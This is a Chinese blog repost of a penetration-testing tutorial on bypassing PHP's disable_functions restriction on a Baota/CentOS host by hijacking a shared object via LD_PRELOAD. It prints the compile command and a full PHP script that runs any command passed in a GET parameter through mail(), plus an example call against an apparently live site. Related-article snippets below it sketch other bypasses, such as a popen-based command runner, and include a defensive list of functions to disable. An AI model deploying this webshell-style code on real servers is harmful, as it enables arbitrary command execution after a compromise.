php函数禁用提权,[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权

最新推荐文章于 2022-03-27 21:35:17 发布
最新推荐文章于 2022-03-27 21:35:17 发布
阅读量346 收藏
点赞数
文章标签: php函数禁用提权

WEB安全第八章实战篇02 绕过Bypass disable_functions 提权

1.环境

宝塔linux主机

主机系统类型 centos php版本 5.4

lazy.png

2.禁用函数

禁用这些执行命令的函数,导致无法执行命令。

lazy.png

lazy.png

3.绕过方法

劫持函数 劫持共享对象 执行命令

cc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so -ldl

根据目标架构编译成不同版本

编译成x86要加上 -m32

下载地址

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

http://swww.apt999.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/www/wwwroot/www.apt999.com/bypass_disablefunc_x64.so

lazy.png

bypass_disablefunc.php

echo "

example: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so

";

$cmd = $_GET["cmd"];

$out_path = $_GET["outpath"];

$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";

echo "

cmdline: " . $evil_cmdline . "

";

putenv("EVIL_CMDLINE=" . $evil_cmdline);

$so_path = $_GET["sopath"];

putenv("LD_PRELOAD=" . $so_path);

mail("", "", "", "");

echo "

output:
" . nl2br(file_get_contents($out_path)) . "

";

unlink($out_path);

?>

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/612

litterbug21
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pcntl php windows_姿势分享——PHP函数禁用绕过浅谈
weixin_39550172的博客
01-06 220
在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。话不多说,直接贴代码:...
PHP通过bypass disable functions执行系统命令的方法汇总
10-18
主要介绍了PHP通过bypass disable functions执行系统命令的方法汇总,需要的朋友可以参考下
通过php内核变量绕过,利用PHP内核变量绕过disable_functions(附完整代码)
weixin_42402188的博客
03-20 162
0×01 概述在https://rdot.org网站上面,有一篇俄语文章专门介绍了如何使用fopen/fread/fwrite函数来操纵内存文件/proc/self/mem。利用这种方法,人们就可以用system()函数的地址来替换GOT中open()函数的地址,这样的话,攻击者就可以通过readfile()函数来随心所欲地执行任意os命令了。但是,这是需要一些前提条件的:PHP 必须运行于PHP...
PHP绕过disable_function限制
BerL1n
09-24 4935
前言 之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。 LD_PRELOAD环境变量突破 LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...
php disable_function绕过
weixin_45794666的博客
03-03 3530
bypass disable_functions disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。 要进行添加的话在php.ini中添加即可,每个函数之间使用逗号隔开。 配置 打开php.ini,搜索disable_function,添加如下函数 eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_o
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
VB-UAC-BYPASS.rar_VB 提权_bypass uac_vb uac_提权_模拟CMD
09-22
标签中的关键词进一步强调了这个主题,"vb_提权"表示这是VB的权限提升技术,"bypass_uac"指的是绕过UAC,"vb_uac"表明这是VB与UAC交互的方式,而"模拟cmd"则再次提及了欺骗用户的方法。 在压缩包内的"UAC欺骗"文件...
精选_Bypass UAC 提权小结_源码打包
03-10
**Bypass UAC 提权小结** 用户账户控制(User Account Control,UAC)是微软在Windows Vista及后续操作系统中引入的一项安全特性,用于保护系统免受恶意软件的影响。它通过要求用户对需要管理员权限的操作进行确认...
一些需要禁用PHP危险函数(disable_functions)
10-28
有时候为了安全我们需要禁掉一些PHP危险函数,整理如下需要的朋友可以参考下
PHP危险函数被禁止怎么绕过,禁用PHP危险函数
weixin_30325875的博客
03-10 415
禁用PHP危险函数是必要的。前些天由于我的疏忽没禁用fsockopen函数,被人利用进行PHPDDOS攻击,导致服务器被机房关机。编辑 php.ini搜索 disable_functions =如果前面有 “#” 就去掉,添加需要禁用函数,以下供参考:disable_functions = phpinfo,system,exec,shell_exec,passthru,proc_open,pr...
Bypass_disable_functions via LD_PRELOAD
qq_45521281的博客
04-22 998
千辛万苦拿到的 webshell 居然无法执行系统命令:
禁止不安全php函数(php.ini)
huike008的博客
12-29 718
为了使php程序更安全,很多站长都选择了禁用一些比较敏感的函数,那影响php安全函数到底有哪些呢,下面我们列出了一些:1、phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中2、passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高3、exec() 功能描述:允许执行一个外部程序(如 UNI...
简单讲解如何绕过PHP disable_function
h0ld1rs的博客
11-01 4440
前言 在渗透测试中,有时遇到拿到webshell后无法执行命令的情况,为了成功提权,需要我们绕过disable_function disable_function简介 disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval并非PHP函数,放在disable_functions中是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。) 绕过方法 1. 寻找未禁用函数 黑名单
Bypass disable_function【CTFHUB】
D.MIND 的博客
05-12 1223
LD_PRELOAD是Linux下的环境变量 它的本意是,允许程序优先加载指定的动态库。这样能够选择不同的动态库中的相同的函数或者变量。 使用场景是:当使用别人提供的动态库,发现其中某些函数实现不合理。但不能要求别人为你修改源代码并重新生成动态库。在这种情况下,使用LD_PRELOAD可以使用自定义的代码替换别人动态库中的部分代码。 利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。 利用条件: 1. 能够上传自己的.so文件 2. 能够控制环境变量
php禁止所有webshell的函数,Webshell下命令执行限制及绕过方法
weixin_34996026的博客
03-18 1334
0×00前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御.0×01 php webshell执行命令原理php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下搜索关键字定位到以下代码function execute($cfe) {$res = '';if ($cfe...
绕过disable_function总结
unexpectedthing的博客
03-27 4777
前言 有些时候,phpinfo()有disable_functions 蚁剑终端命令不起作用,就可能是df的问题 黑名单绕过 就是一些运维人员php命令执行的函数禁用完 exec,passthru,shell_exec,eval,system,popen,proc_open(),pcntl_exec 前几种都比较简单 popen 打开进程文件指针 <?php $command=$_POST['cmd']; $handle = popen($command,"r"); while(!feof($
as_bypass_php_disable_functions-master
最新发布
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有时候我们可能需要在某些情况下调用被禁用函数,例如一些特殊的需求或者调试目的。这时候,as_bypass_php_disable_functions-master就能帮助我们绕过这些禁用函数的限制。 该项目通过利用PHP的一些特性和漏洞,向PHP进程添加自定义扩展或修改PHP源代码的方式,以实现绕过禁用函数的效果。 使用这个项目需要一定的PHP编程知识和经验。首先,我们需要将项目中的代码部署到服务器上。然后,根据自己的需求,参考项目文档中的说明进行配置。 在项目运行后,我们就可以使用禁用函数了。但是需要注意的是,使用这个项目绕过禁用函数可能会带来一些风险和安全隐患。因此,我们应该谨慎使用,并确保代码的安全性。 总之,as_bypass_php_disable_functions-master是一个用于绕过PHP禁用函数的项目,可以帮助我们在特殊情况下调用被禁用函数。但是使用时需要注意安全性和潜在的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值